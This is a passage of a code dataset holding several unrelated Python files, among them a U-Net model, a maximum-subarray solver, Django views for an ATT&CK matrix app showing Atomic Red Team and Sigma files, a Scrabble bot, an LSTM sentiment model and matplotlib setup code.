axis=3)\r\n else:\r\n u1 = concatenate([u1, c1], axis=3)\r\n\r\n if half_net:\r\n c8 = conv_bn_act(u1, filters, drop_out=drop_out)\r\n c8 = conv_bn_act(c8, filters, drop_out=drop_out)\r\n else:\r\n c8 = df_block(u1, filters, compression=compression, drop_out=drop_out)\r\n c8 = df_block(c8, filters, compression=compression, drop_out=drop_out)\r\n\r\n c9 = Conv2D(1, (1, 1), padding=\"same\", activation='sigmoid')(c8)\r\n\r\n return Model(inputs=[inputShape], outputs=[c9])\r\n\r\nif __name__ == \"__main__\":\r\n \r\n model = TB_UNet(attention_gates=attention_gates)\r\n \r\n model.summary()\r\n","repo_name":"ahmedeqbal/TB-DenseNet","sub_path":"TB-UNet.py","file_name":"TB-UNet.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29621354032","text":"import sys\n\n\ndef _solve_crossing(arr: list[int], lo: int, mi: int, hi: int) -> tuple[int, int, int]:\n l_sum = r_sum = -sys.maxsize - 1\n c_sum, l_max, r_max = 0, mi, mi + 1\n\n for i in range(mi, lo - 1, -1):\n c_sum += arr[i]\n if c_sum > l_sum:\n l_sum = c_sum\n l_max = i\n\n c_sum = 0\n for i in range(mi + 1, hi + 1):\n c_sum += arr[i]\n if c_sum > r_sum:\n r_sum = c_sum\n r_max = i\n\n c_sum = l_sum + r_sum\n if l_sum > r_sum and l_sum > c_sum:\n return l_max, mi, l_sum\n elif r_sum > l_sum and r_sum > c_sum:\n return mi + 1, r_max, r_sum\n\n return l_max, r_max, c_sum\n\n\ndef solve(arr: list[int], lo: int, hi: int) -> tuple[int, int, int]:\n \"\"\"Solve the Maximum Subarray problem with random integer array input.\n\n >>> solve([12, -2, -23, 18, -1, -14, -21, 16, 19, -5, 10, -3, -20, 13, -4, -7], 0, 15)\n (7, 10, 40)\n \"\"\"\n if lo == hi:\n return lo, hi, arr[lo]\n\n mi = (lo + hi) // 2\n l_tup = solve(arr, lo, mi)\n r_tup = solve(arr, mi + 1, hi)\n c_tup = _solve_crossing(arr, lo, mi, hi)\n\n if l_tup[2] > r_tup[2] and l_tup[2] > c_tup[2]:\n return l_tup\n\n if r_tup[2] > l_tup[2] and r_tup[2] > c_tup[2]:\n return r_tup\n\n return c_tup\n\n\nif __name__ == '__main__':\n import doctest\n\n doctest.testmod()\n","repo_name":"khoaji/algorithm","sub_path":"divide_conquer/maximum_subarray.py","file_name":"maximum_subarray.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10934940806","text":"#!python3\n\nimport requests,bs4,webbrowser,sys\n\nURL='https://www.baidu.com/s?wd=' + ''.join(sys.argv[1:])\nheaders={\n\t\"User-Agent\":\"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36\"\n}\n\n\nprint('Googling...')\nres=requests.get(URL,headers=headers)\nres.raise_for_status()\n\nsoup=bs4.BeautifulSoup(res.text,'html.parser')\nlinkElems=soup.select('.t a')\n\nnumOpen=min(5, len(linkElems))\nfor i in range(numOpen):\n\twebbrowser.open(linkElems[i].get('href'))\n\n\n","repo_name":"414aj/learn_1","sub_path":"lucky.py","file_name":"lucky.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21104870407","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom matrix.models import Tactic, Technique, Platform, DataSource, Note, SigmaRule, LogSource\nfrom django.conf import settings\nfrom django.views import generic\nimport os\nfrom django.urls import reverse\nimport datetime\nfrom django.views.generic import TemplateView\nfrom django import template\nfrom markdownx.utils import markdownify\nfrom django.urls import reverse_lazy\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom matrix.forms import noteForm\n\n\ndef index(request):\n \"\"\"View function for home page of site.\"\"\"\n\n ## Generate the number of tactics and names\n num_tactics = Tactic.objects.all().count()\n tactics = Tactic.objects.all().order_by('tactic_id')\n tactic_names = list()\n tactic_shortnames = list()\n techniques_by_tactic = {}\n for tactic in tactics:\n tactic_names.append(tactic.tactic_name)\n tactic_techniques = Technique.objects.filter(tactic_name=tactic).order_by('technique_name')\n techniques_by_tactic[tactic.tactic_name] = tactic_techniques\n\n ## Define the context \n context = {\n 'techniques_by_tactic': techniques_by_tactic,\n }\n\n ## Render the HTML template index.html with the data in the context variable\n return render(request, 'index.html', context)\n #return render(request, 'test.html', context)\n\n#class SigmaRuleView(generic.ListView):\n# model = SigmaRule\n\ndef alltactics(request):\n total_tactics = Tactic.objects.all()\n context = {\n 'total_tactics': total_tactics,\n }\n\n ## Render the HTML template index.html with the data in the context variable\n return render(request, 'matrix/tactic_list.html', context=context)\n\ndef allTechPerTactic(request):\n techfortactics = Technique.objects.filter(tactic_name='Impact')\n tactfortactics = Tactic.objects.filter(tactic_name='Impact')\n\n ## Define the context\n context = {\n 'techfortactics': techfortactics,\n 'tactfortactics': tactfortactics,\n }\n ## Render the HTML template index.html with the data in the context variable\n return render(request, 'matrix/tech_for_tactic.html', context)\n\n\nclass TacticDetailView(generic.DetailView):\n model = Tactic\n #template_name = 'matrix/TacticTemplate.html'\n\nclass TechniqueDetailView(generic.DetailView):\n model = Technique\n\ndef alltechniques(request):\n total_techniques = Technique.objects.all()\n context = {\n 'total_techniques': total_techniques,\n }\n\n # Render the HTML template index.html with the data in the context variable\n return render(request, 'matrix/technique_list.html', context)\n\nclass TacticListView(TemplateView):\n template_name = \"TacticTemplate\"\n\nclass TechniqueListView(generic.ListView):\n model = Technique\n\ndef atomics(request, pk):\n atomic = Technique.objects.get(pk=pk)\n atomic_file = open(settings.MEDIA_ROOT + '/atomics/' + atomic.technique_id + \".md\", 'r')\n atom = atomic_file.read()\n atomic_file.close()\n context = {\n 'atomic' : atomic,\n 'atom' : markdownify(atom),\n }\n\n return render(request, 'matrix/atomic.html', context)\n\ndef addnote(request, pk):\n if request.method == \"POST\":\n form = noteForm(request.POST)\n if form.is_valid():\n note = form.save(commit=True)\n note.save()\n return redirect('individualTechnique', pk=pk)\n\n else:\n technique = Technique.objects.get(pk=pk)\n # Get all notes for a given technique\n notes = Note.objects.filter(technique_id=pk)\n form = noteForm()\n form.fields['technique'].initial = pk \n form.fields['date'].initial = datetime.datetime.now()\n\n #return render(request, 'matrix/addnote.html', context)\n #return HttpResponseRedirect(reverse('addnote', args=(technique.technique_id,)))\n return render(request, 'matrix/noteForm.html', {'form': form})\n\n\nclass NoteDelete(DeleteView):\n model = Note\n success_url = reverse_lazy('notes')\n\n\ndef noteCreator(request, pk):\n technique = Technique.objects.get(pk=pk)\n # Get all notes for a given technique\n notes = Note.objects.filter(technique_id=technique.technique_id)\n \n addnote = \"This is a new note\"\n\n #Define the context\n context = {\n 'addnote': addnote,\n 'notes': notes,\n 'note': addnote,\n }\n\n return render(request, 'matrix/noteForm.html', context)\n #return render(request, /)\n\n\nclass NoteCreate(CreateView):\n model = Note\n fields = '__all__'\n initial = {'date': datetime.datetime.now(), 'note': 'notes'}\n\nclass NoteUpdate(UpdateView):\n model = Note\n fields = ['note', 'date', 'technique']\n\nclass NoteDetailView(generic.DetailView):\n model = Note\n tech = Technique\n\nclass NoteListView(generic.ListView):\n model = Note\n\ndef notesPerTech(request, pk):\n # Get all notes for a given technique\n notes = Note.objects.filter(technique_id=pk)\n all_notes = list()\n for note in notes:\n all_notes.append(note.note)\n\n #Define the context\n context = {\n 'tech_notes': all_notes,\n 'tech_id': technique,\n }\n\n return render(request, 'matrix/notes_for_tech.html', context)\n\ndef updateNotesPerTech(request, pk):\n #technique = get_object_or_404(Technique, pk=pk)\n note = Note.objects.get(pk=pk)\n technique = Technique.objects.get(technique_name=note.technique)\n # Get all notes for a given technique\n notes = Note.objects.filter(technique_id=pk)\n all_notes = list()\n for note in notes:\n all_notes.append(note.note)\n\n #Define the context\n context = {\n 'tech_notes': all_notes,\n 'tech_id': technique,\n }\n\n return render(request, 'note_update', context)\n\ndef addTechnique(request):\n platforms = Platform.objects.all()\n dataSources = DataSource.objects.all()\n tactics = Tactic.objects.all()\n context = {\n 'platforms': platforms,\n 'dataSources': dataSources,\n 'tactics': tactics,\n }\n return render(request, 'matrix/addTechnique.html' ,context)\n\ndef addSigma(request):\n context = {\n 'hi': \"hi\",\n }\n return render(request, 'matrix/addSigma.html' ,context)\n\n\ndef individualTechnique(request, pk):\n technique = Technique.objects.get(pk=pk)\n platforms = Platform.objects.filter(technique=technique.technique_id)\n data_sources = DataSource.objects.filter(technique=technique.technique_id)\n tactics = Tactic.objects.filter(technique=technique.technique_id)\n ## Get all notes for a given technique\n notes = Note.objects.filter(technique_id=technique.technique_id)\n all_notes = notes[::-1]\n\n ## SIGMA RULES\n sigma_rules = list()\n rules = SigmaRule.objects.filter(technique=technique.technique_id)\n rule_names = list()\n yaml_rule_list = list()\n for rule in rules:\n sigma_rules.append(\"/sigma_rules/\" + rule.rule_name + \".yml\")\n sigma = open(settings.MEDIA_ROOT + '/' + rule.rule_file.name ,'r')\n yaml_rule_list.append([rule.rule_name, sigma.read()])\n sigma.close()\n\n ## ATOMICS\n atomic = technique\n null_atom = \"\"\n try:\n atomic_file = open(settings.MEDIA_ROOT + '/atomics/' + atomic.technique_id + \".md\", 'r')\n atomic_yaml = open(settings.MEDIA_ROOT + '/atomics/' + atomic.technique_id + \".yaml\", 'r')\n atom = atomic_file.read()\n atom_yaml = atomic_yaml.read()\n atomic_file.close()\n atomic_yaml.close()\n except:\n null_atom = \"There are currently no Atomic Red Team tests available for this technique.\"\n atom_yaml = \"\"\n atom = \"\"\n\n \n ## Define the Context\n context = {\n 'technique': technique,\n 'platforms': platforms,\n 'data_sources': data_sources,\n 'tactics': tactics,\n 'technique_description': markdownify(technique.technique_description),\n 'technique_url': technique.technique_url,\n 'technique_id': technique.technique_id,\n 'technique_detection': markdownify(technique.technique_detection),\n 'technique_name': technique.technique_name,\n 'atom': markdownify(atom),\n 'atom_yaml': atom_yaml,\n 'null_atom': null_atom,\n 'tech_notes': all_notes,\n 'yaml_rules': yaml_rule_list,\n }\n return render(request, 'matrix/technique.html', context = context)\n\n","repo_name":"Elemental-attack/Elemental","sub_path":"elemental/matrix/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8362,"program_lang":"python","lang":"en","doc_type":"code","stars":310,"dataset":"github-code","pt":"77"} +{"seq_id":"75237689527","text":"from reportlab.pdfgen import canvas\nfrom reportlab.lib.pagesizes import A4, letter\n\nw, h = A4\n\n# creating a pdf object\nc = canvas.Canvas(\"texts.pdf\")\n\ntext = c.beginText(50, h - 50)\ntext.setFont(\"Times-Roman\", 12)\n\ntext.textLine(\"Hello world!\")\ntext.textLine(\"From ReportLab and Python!\")\ntext.textLines(\"Hello world!\\n\\n\\n\\n\\nFrom ReportLab and Python!\")\n\nc.drawText(text)\n\nc.save()\n","repo_name":"mostafijur-rahman299/python-reportlab-example","sub_path":"texts.py","file_name":"texts.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6387751288","text":"import random\nimport visualizers\nfrom scrabble import *\n\nclass Bot():\n def best_moves(self, board, rack, bag):\n squares_exhausted = set()\n squares_to_consider = []\n best_move = Move(Move.PLAY)\n current_letters = []\n current_position = Position()\n\n self.best_score = 0\n self.primary_score = 0\n self.primary_multiplier = 1\n self.secondary_score = 0\n\n for row in xrange(board.height):\n for col in xrange(board.width):\n pos = Position(row, col)\n if board.is_next_to_letter(pos) and not board.letter_at(pos):\n squares_to_consider.append(pos)\n if not squares_to_consider and not board.letter_at(board.get_center()):\n squares_to_consider.append(board.get_center())\n\n def try_moves_at(square):\n position = square.copy()\n position.direction = Position.DOWN\n try_moves_back(position)\n\n position = square.copy()\n position.direction = Position.ACROSS\n try_moves_back(position)\n\n squares_exhausted.add(str(square))\n\n def points_for_letter_at_square(letter, square):\n return board.letter_multiplier_at(square) * bag.get_letter_value(letter)\n\n def points_for_crossword_at(square):\n total = 0\n is_crossword = False\n\n square.switch_direction()\n back_pos = square.copy()\n forward_pos = square.copy()\n square.switch_direction()\n\n back_pos.step(-1)\n forward_pos.step(1)\n\n letter = board.letter_at(back_pos)\n while letter:\n is_crossword = True\n total += bag.get_letter_value(letter)\n back_pos.step(-1)\n letter = board.letter_at(back_pos)\n\n letter = board.letter_at(forward_pos)\n while letter:\n is_crossword = True\n total += bag.get_letter_value(letter)\n forward_pos.step(1)\n letter = board.letter_at(forward_pos)\n\n if not is_crossword:\n return 0\n\n new_letter = board.letter_at(square)\n total += bag.get_letter_value(new_letter) * board.letter_multiplier_at(square)\n\n total *= board.word_multiplier_at(square)\n return total\n\n def place_letter_on_board(letter, square):\n board.set_letter_at(letter, square)\n rack.remove(letter)\n\n self.secondary_score += points_for_crossword_at(square)\n self.primary_score += points_for_letter_at_square(letter, square)\n self.primary_multiplier *= board.word_multiplier_at(square)\n\n def remove_letter_from_board(letter, square):\n self.secondary_score -= points_for_crossword_at(square)\n self.primary_score -= points_for_letter_at_square(letter, square)\n self.primary_multiplier /= board.word_multiplier_at(square)\n\n board.remove_letter_at(square)\n rack.append(letter)\n\n def current_score():\n return self.primary_score * self.primary_multiplier + self.secondary_score\n\n def is_potential_word_at(square):\n word = board.word_at(square)\n if not word or len(word) < 2:\n return True\n return self.index.has_word_containing(word)\n\n def is_crossword_valid_at(square):\n word = board.word_at(square.switched_direction())\n if not word or len(word) < 2:\n return True\n return self.index.word_list.is_word(word)\n\n def try_moves_back(square):\n original_square = square.copy()\n for letter in rack:\n place_letter_on_board(letter, square)\n current_position.copy_from(original_square)\n current_letters.reverse()\n current_letters.append(letter)\n current_letters.reverse()\n\n if ( is_crossword_valid_at(square) and\n is_potential_word_at(square) ):\n\n valid = board.step_until_empty(square, -1)\n try_moves_forward(square)\n\n if valid and not str(square) in squares_exhausted:\n try_moves_back(square)\n\n current_letters.pop(0)\n square.copy_from(original_square)\n remove_letter_from_board(letter, square)\n\n def try_moves_forward(square):\n # if score of current placement is good, huzzah!\n word = board.word_at(square)\n score = current_score()\n if word and self.index.word_list.is_word(word):\n # Consider the move\n if not best_move.letters or score > self.best_score:\n self.best_score = score\n best_move.set_letters(\"\".join(current_letters))\n best_move.set_position(current_position.copy())\n\n original_square = square.copy()\n\n valid = board.step_until_empty(square, 1)\n starting_square = square.copy()\n if valid and not str(square) in squares_exhausted:\n for letter in rack:\n place_letter_on_board(letter, square)\n current_letters.append(letter)\n\n if ( is_crossword_valid_at(square) and\n is_potential_word_at(square) ):\n try_moves_forward(square)\n\n current_letters.pop()\n square.copy_from(starting_square)\n remove_letter_from_board(letter, square)\n\n square.copy_from(original_square)\n\n for square in squares_to_consider:\n # Find best moves at that square\n try_moves_at(square)\n\n if not best_move.letters:\n best_move.set_move_type(Move.PASS)\n\n return best_move\n\n def get_move(self, game):\n board = game.board\n rack = game.current_rack()\n bag_template = game.bag.template\n move = self.best_moves(board, rack, bag_template)\n return move\n\n def __init__(self, index=None):\n self.index = index\n\nclass Index():\n GAP_SYMBOL = \"?\"\n\n def index_word_with(self, word, size=3, gaps_at=None):\n if len(word) >= size:\n for i in xrange(len(word) - size + 1):\n part = word[i:i+size]\n if gaps_at:\n for gap in gaps_at:\n part = part[:gap-1] + self.GAP_SYMBOL + part[gap:]\n if part not in self.index:\n self.index[part] = []\n self.index[part].append(word)\n\n def index_whole_words_with_one_gap(self):\n for word in self.word_list.words:\n size = len(word)\n for gap_pos in xrange(size):\n self.index_word_with(word, size, [gap_pos+1])\n\n def index_words_with(self, size, gaps_at=None):\n for word in self.word_list.words:\n self.index_word_with(word, size=size, gaps_at=gaps_at)\n\n def index_word(self, word):\n for size in range(1,15):\n self.index_word_with(word, size=size)\n\n def set_word_list(self, word_list):\n self.word_list = word_list\n for word in word_list.words:\n self.index_word(word.upper())\n\n def has_word_containing(self, pattern):\n return pattern in self.index\n\n def has_words_matching(self, pattern):\n return pattern in self.index\n\n def get_words_matching(self, pattern):\n pattern = pattern.upper()\n if pattern in self.index:\n return self.index[pattern]\n\n # index_patterns:\n # ???\n # ????\n # ^??\n # ?_?\n # ^?_?$\n # ...\n\n def __init__(self):\n self.word_list = None\n self.index = {}\n","repo_name":"dbieber/ScrabbleBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7860,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"77"} +{"seq_id":"29884473693","text":"import tensorflow as tf\nimport numpy as np\nimport glob #this will be useful when reading reviews from file\nimport os\nimport tarfile\nimport re\nimport string\n\n\nbatch_size = 50\nacc = 64\nnumClasses = 2\nmaxSeqLength = 40 #Maximum length of sentence\nnumDimensions = 50 #Dimensions for each word vector\n\n\ndef extract_data(filename):\n \"\"\"Extract data from tarball and store as list of strings\"\"\"\n if not os.path.exists(os.path.join(os.path.dirname(__file__), 'reviews/')):\n with tarfile.open(filename, \"r\") as tarball:\n dir = os.path.dirname(__file__)\n tarball.extractall(os.path.join(dir, 'reviews/'))\n return\n\ndef read_data():\n print(\"READING DATA\")\n dir = os.path.dirname(__file__)\n file_list = glob.glob(os.path.join(dir, 'reviews/pos/*'))\n file_list.extend(glob.glob(os.path.join(dir, 'reviews/neg/*')))\n print(\"Parsing %s files\" % len(file_list))\n return file_list\n\ndef load_data(glove_dict):\n \"\"\"\n Take reviews from text files, vectorize them, and load them into a\n numpy array. Any preprocessing of the reviews should occur here. The first\n 12500 reviews in the array should be the positive reviews, the 2nd 12500\n reviews should be the negative reviews.\n RETURN: numpy array of data with each row being a review in vectorized\n form\"\"\"\n extract_data('reviews.tar.gz')\n reviewData = read_data()\n reviewArray = np.zeros(shape=(25000,40), dtype=int)\n index = 0\n\n for rev in reviewData:\n with open(rev, \"r\", encoding='utf-8') as fileinput:\n reviewText = \"\"\n for line in fileinput:\n line = line.rstrip().lower()\n line = re.sub(\"
\",' ',line)\n line = re.sub('[%s]' % string.punctuation,'',line)\n reviewText = reviewText + \" \" + line\n #print(line)\n #print (\"Review: \" + reviewText + \"\\n\")\n npArray = np.array(reviewText.split(' '))\n npArray = list(filter(None, npArray))\n npArray = np.asarray(npArray)\n if len(npArray) > maxSeqLength:\n npArray = npArray[:maxSeqLength]\n #print(npArray)\n for n,i in enumerate(npArray):\n if i in glove_dict:\n npArray[n]=glove_dict[i]\n else:\n npArray[n] = \"0\"\n npArray = npArray.astype(int)\n if len(npArray) != maxSeqLength:\n npArray = np.pad(npArray, pad_width=(0, maxSeqLength-len(npArray)), mode='constant')\n #print(npArray)\n reviewArray[index] = npArray\n index = index + 1\n\n print('files finished')\n print(reviewArray[5])\n data = reviewArray\n return data\n\ndef load_glove_embeddings():\n \"\"\"\n Load the glove embeddings into a array and a dictionary with words as\n keys and their associated index as the val. Assumes the glove\n embeddings are located in the same directory and named \"glove.6B.50d.txt\"\n RETURN: embeddings: the array containing word vectors\n word_index_dict: a dictionary matching a word in string form to\n its index in the embeddings array. e.g. {\"apple\": 119\"}\n \"\"\"\n\n data = open(\"glove.6B.50d.txt\",'r', encoding=\"utf-8\")\n lines = data.readlines()\n #if you are running on the CSE machines, you can load the glove data from here\n #data = open(\"/home/cs9444/public_html/17s2/hw2/glove.6B.50d.txt\",'r',encoding=\"utf-8\")\n i = 1\n lineCount = len(lines)\n print(lineCount)\n embeddings = np.zeros(shape=(lineCount,50), dtype=np.float32)\n word_index_dict = {}\n word_index_dict[\"UNK\"] = 0\n\n for line in lines:\n lineSplit = line.split(' ', 1)\n word = lineSplit[0]\n line = lineSplit[1]\n\n npArray = np.fromstring(line, dtype=float, sep=' ')\n\n embeddings[i-1] = npArray\n\n word_index_dict[word] = i\n i = i + 1\n\n #test print\n print(embeddings[1])\n print(word_index_dict[\",\"])\n return embeddings, word_index_dict\n\n\ndef define_graph(glove_embeddings_arr):\n \"\"\"\n Define the tensorflow graph that forms your model. You must use at least\n one recurrent unit. The input placeholder should be of size [batch_size,\n 40] as we are restricting each review to it's first 40 words. The\n following naming convention must be used:\n Input placeholder: name=\"input_data\"\n labels placeholder: name=\"labels\"\n accuracy tensor: name=\"accuracy\"\n loss tensor: name=\"loss\"\n\n RETURN: input placeholder, labels placeholder, dropout_keep_prob, optimizer, accuracy and loss\n tensors\"\"\"\n lstm_units = 32\n dropoutRate = 0.6\n\n labels = tf.placeholder(name=\"labels\", dtype=tf.float32, shape=[batch_size,numClasses])\n input_data = tf.placeholder(name=\"input_data\", dtype=tf.int32, shape=[batch_size,maxSeqLength])\n embedData = tf.nn.embedding_lookup(glove_embeddings_arr, input_data)\n\n dropout_keep_prob = tf.placeholder_with_default(dropoutRate, name=\"dropout_keep_prob\", shape=())\n\n lstm = tf.contrib.rnn.BasicLSTMCell(lstm_units)\n lstm = tf.contrib.rnn.DropoutWrapper(cell=lstm, output_keep_prob=dropout_keep_prob)\n val, _ = tf.nn.dynamic_rnn(lstm, embedData, dtype=tf.float32)\n\n w = tf.Variable(tf.truncated_normal([lstm_units, 2]))\n b = tf.Variable(tf.constant(0.1, shape=[2]))\n val = tf.transpose(val, [1, 0, 2])\n last = tf.gather(val, int(val.get_shape()[0]) - 1)\n pred = (tf.matmul(last, w) + b)\n\n correctPred = tf.equal(tf.argmax(pred,1), tf.argmax(labels,1))\n accuracy = tf.reduce_mean(tf.cast(correctPred, dtype=tf.float32))\n\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=labels))\n optimizer = tf.train.AdamOptimizer().minimize(loss)\n\n accuracy = tf.identity(accuracy, name=\"accuracy\")\n loss = tf.identity(loss, name=\"loss\")\n\n return input_data, labels, dropout_keep_prob, optimizer, accuracy, loss\n","repo_name":"maxhuynh/9444-assn2","sub_path":"implementation.py","file_name":"implementation.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72419697529","text":"# -*- coding: utf-8 -*-\n\"\"\"\nNotes:\n To use various backends certian packages are required\n\n PyQt\n ...\n\n Tk\n pip install\n sudo apt-get install tk\n sudo apt-get install tk-dev\n\n Wx\n pip install wxPython\n\n GTK\n pip install PyGTK\n pip install pygobject\n pip install pygobject\n\n Cairo\n pip install pycairo\n pip install py2cairo\n pip install cairocffi\n sudo apt-get install libcairo2-dev\n\n\nCommandLine:\n python -m wbia.plottool.draw_func2 --exec-imshow --show --mplbe=GTKAgg\n python -m wbia.plottool.draw_func2 --exec-imshow --show --mplbe=TkAgg\n python -m wbia.plottool.draw_func2 --exec-imshow --show --mplbe=WxAgg\n python -m wbia.plottool.draw_func2 --exec-imshow --show --mplbe=WebAgg\n python -m wbia.plottool.draw_func2 --exec-imshow --show --mplbe=gdk\n python -m wbia.plottool.draw_func2 --exec-imshow --show --mplbe=cairo\n\n\"\"\"\nimport os\nimport sys\n\nimport utool as ut\n\nut.noinject(__name__, '[plottool.__MPL_INIT__]')\n\ntry:\n import builtins\n\n profile = getattr(builtins, 'profile')\nexcept AttributeError:\n\n def profile(func):\n return func\n\n\n__IS_INITIALIZED__ = False\n__WHO_INITIALIZED__ = None\n\n\nVERBOSE_MPLINIT = ut.get_argflag(('--verb-mpl', '--verbose'))\nTARGET_BACKEND = ut.get_argval(\n ('--mpl-backend', '--mplbe'), type_=str, default=os.environ.get('MPL_BACKEND', None)\n)\nFALLBACK_BACKEND = ut.get_argval(\n ('--mpl-fallback-backend', '--mplfbbe'), type_=str, default='agg'\n)\n\n\ndef print_all_backends():\n import matplotlib.rcsetup as rcsetup\n\n print(rcsetup.all_backends)\n valid_backends = [\n 'GTK',\n 'GTKAgg',\n 'GTKCairo',\n 'MacOSX',\n 'Qt4Agg',\n 'Qt5Agg',\n 'TkAgg',\n 'WX',\n 'WXAgg',\n 'CocoaAgg',\n 'GTK3Cairo',\n 'GTK3Agg',\n 'WebAgg',\n 'nbAgg',\n 'agg',\n 'cairo',\n 'emf',\n 'gdk',\n 'pdf',\n 'pgf',\n 'ps',\n 'svg',\n 'template',\n ]\n del valid_backends\n\n\ndef get_pyqt():\n have_guitool = ut.check_module_installed('guitool')\n try:\n if have_guitool:\n from wbia.guitool import __PYQT__ as PyQt # NOQA\n\n pyqt_version = PyQt._internal.GUITOOL_PYQT_VERSION\n else:\n try:\n import PyQt5 as PyQt\n\n pyqt_version = 5\n except ImportError:\n import PyQt4 as PyQt\n\n pyqt_version = 4\n except ImportError:\n PyQt = None\n pyqt_version = None\n return PyQt, pyqt_version\n\n\ndef get_target_backend():\n if (\n not sys.platform.startswith('win32')\n and not sys.platform.startswith('darwin')\n and os.environ.get('DISPLAY', None) is None\n ):\n # Write to files if we cannot display\n # target_backend = 'PDF'\n target_backend = FALLBACK_BACKEND\n else:\n target_backend = TARGET_BACKEND\n if target_backend is None:\n PyQt, pyqt_version = get_pyqt()\n if pyqt_version is None:\n print(\n '[!plotttool] WARNING backend fallback to {}'.format(FALLBACK_BACKEND)\n )\n target_backend = FALLBACK_BACKEND\n elif pyqt_version == 4:\n target_backend = 'Qt4Agg'\n elif pyqt_version == 5:\n target_backend = 'Qt5Agg'\n else:\n raise ValueError('Unknown pyqt version {!r}'.format(pyqt_version))\n return target_backend\n\n\ndef _init_mpl_rcparams():\n import matplotlib as mpl\n from matplotlib import style\n\n # http://matplotlib.org/users/style_sheets.html\n nogg = ut.get_argflag('--nogg')\n if not nogg:\n style.use('ggplot')\n # style.use(['ggplot'])\n # print('style.available = %r' % (style.available,))\n # style.use(['bmh'])\n # style.use(['classic'])\n # import utool\n # utool.embed()\n # style.use(['ggplot', 'dark_background'])\n if ut.get_argflag('--notoolbar'):\n toolbar = 'None'\n else:\n toolbar = 'toolbar2'\n mpl.rcParams['toolbar'] = toolbar\n # mpl.rc('text', usetex=False)\n\n if ut.get_argflag('--usetex'):\n # mpl.rc('text', usetex=True)\n mpl.rcParams['text.usetex'] = True\n # matplotlib.rcParams['text.latex.preamble']=[r\"\\usepackage{amsmath}\"]\n mpl.rcParams['text.latex.unicode'] = True\n mpl_keypress_shortcuts = [\n key for key in mpl.rcParams.keys() if key.find('keymap') == 0\n ]\n for key in mpl_keypress_shortcuts:\n mpl.rcParams[key] = ''\n\n CUSTOM_GGPLOT = 1\n if CUSTOM_GGPLOT and not nogg:\n ggplot_style = style.library['ggplot'] # NOQA\n # print('ggplot_style = %r' % (ggplot_style,))\n custom_gg = {\n 'axes.axisbelow': True,\n # 'axes.edgecolor': 'white',\n 'axes.facecolor': '#E5E5E5',\n 'axes.edgecolor': 'none',\n # 'axes.facecolor': 'white',\n 'axes.grid': True,\n 'axes.labelcolor': '#555555',\n 'axes.labelsize': 'large',\n 'axes.linewidth': 1.0,\n 'axes.titlesize': 'x-large',\n 'figure.edgecolor': '0.50',\n 'figure.facecolor': 'white',\n 'font.size': 10.0,\n 'grid.color': 'white',\n 'grid.linestyle': '-',\n 'patch.antialiased': True,\n 'patch.edgecolor': '#EEEEEE',\n 'patch.facecolor': '#348ABD',\n 'patch.linewidth': 0.5,\n 'xtick.color': '#555555',\n 'xtick.direction': 'out',\n 'ytick.color': '#555555',\n 'ytick.direction': 'out',\n 'axes.prop_cycle': mpl.cycler(\n 'color',\n [\n '#E24A33',\n '#348ABD',\n '#988ED5',\n '#777777',\n '#FBC15E',\n '#8EBA42',\n '#FFB5B8',\n ],\n ),\n }\n mpl.rcParams.update(custom_gg)\n\n NICE_DARK_BG = False\n if NICE_DARK_BG:\n dark_style = {\n 'axes.edgecolor': 'white',\n 'axes.facecolor': 'black',\n 'axes.labelcolor': 'white',\n 'figure.edgecolor': 'black',\n 'figure.facecolor': 'black',\n 'grid.color': 'white',\n 'lines.color': 'white',\n 'patch.edgecolor': 'white',\n 'savefig.edgecolor': 'black',\n 'savefig.facecolor': 'black',\n 'text.color': 'white',\n 'xtick.color': 'white',\n 'ytick.color': 'white',\n }\n mpl.rcParams.update(dark_style)\n mpl.rcParams['figure.subplot.top'] = 0.8\n # mpl.rcParams['text'].usetex = False\n # for key in mpl_keypress_shortcuts:\n # print('%s = %s' % (key, mpl.rcParams[key]))\n # Disable mpl shortcuts\n # mpl.rcParams['toolbar'] = 'None'\n # mpl.rcParams['interactive'] = True\n\n # import matplotlib.pyplot as plt\n # plt.xkcd()\n\n\ndef _mpl_set_backend(target_backend):\n import matplotlib as mpl\n\n if ut.get_argflag('--leave-mpl-backend-alone'):\n print('[pt] LEAVE THE BACKEND ALONE !!! was specified')\n print('[pt] not changing mpl backend')\n else:\n # mpl.use(target_backend, force=True)\n mpl.use(target_backend, force=False)\n current_backend = mpl.get_backend()\n if not ut.QUIET and ut.VERBOSE:\n print('[pt] current backend is: %r' % current_backend)\n\n\ndef _init_mpl_mainprocess(verbose=VERBOSE_MPLINIT):\n global __IS_INITIALIZED__\n global __WHO_INITIALIZED__\n import matplotlib as mpl\n\n # mpl.interactive(True)\n current_backend = mpl.get_backend()\n target_backend = get_target_backend()\n if __IS_INITIALIZED__ is True:\n if verbose:\n print(\n '[!plottool] matplotlib has already been initialized. backend=%r'\n % current_backend\n )\n print('[!plottool] Initially initialized by %r' % __WHO_INITIALIZED__)\n print(\n '[!plottool] Trying to be init by %r'\n % (ut.get_caller_name(N=range(0, 5)))\n )\n return False\n __IS_INITIALIZED__ = True\n\n if verbose:\n print('[plottool] matplotlib initialized by %r' % __WHO_INITIALIZED__)\n __WHO_INITIALIZED__ = ut.get_caller_name(N=range(0, 5))\n if verbose:\n print('--- INIT MPL---')\n 